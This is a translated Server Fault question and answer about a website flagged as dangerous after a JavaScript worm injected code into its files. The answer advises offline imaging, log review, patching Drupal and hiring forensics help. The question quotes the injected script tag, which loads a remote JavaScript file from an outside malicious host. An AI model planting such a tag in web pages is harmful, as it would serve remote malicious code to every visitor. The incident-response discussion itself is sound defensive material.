JS Worm：如何找到入口點

我的網站被 Google/StopBadware.org 標記為危險，我在幾個 js/html 文件中發現了這一點：

<script type="text/javascript" src="http://oployau.fancountblogger.com:8080/Gigahertz.js"></script>
<!--a0e2c33acd6c12bdc9e3f3ba50c98197-->

我清理了幾個文件，我恢復了備份，但如何了解蠕蟲是如何安裝的？我可以在日誌文件中查找什麼？這個伺服器，一個 Centos 5，只用作一個 apache 伺服器，安裝了我們的程序，一個 tikiwiki，一個 drupal。

謝謝塞德里克

_

入侵事件分析絕非易事，特別是如果您沒有遵循標準的恢復程序（使物理伺服器離線，獲取它有權訪問的所有文件系統的扇區映像，從安裝介質完全重建機器，恢復數據） .

通常，您會首先查看所有日誌文件，從 Apache 日誌開始。在您的情況下，最可能的攻擊媒介是 drupal，但它絕不是唯一可能的攻擊媒介，因此應檢查所有日誌（我的意思是所有日誌）。根據您使用的文件系統，可以採取其他步驟來確定感染時發生的活動，並確定使用的攻擊媒介和完成的操作。

同時，檢查您的機器正在執行的所有軟體，並確保它們都是最新的。這包括您所有的 drupal 模組、主題等。我還會用梳子檢查任何自定義程式碼。

編輯：我忘了提到這樣一個事實，在您的情況下，由於您顯然沒有內部的相關專業知識，您可能需要考慮將事件承包給一家進行法醫分析的安全公司：這可能有點昂貴的一面，但你會得到關於發生了什麼以及如何防止它的明確答案。

引用自：https://serverfault.com/questions/150947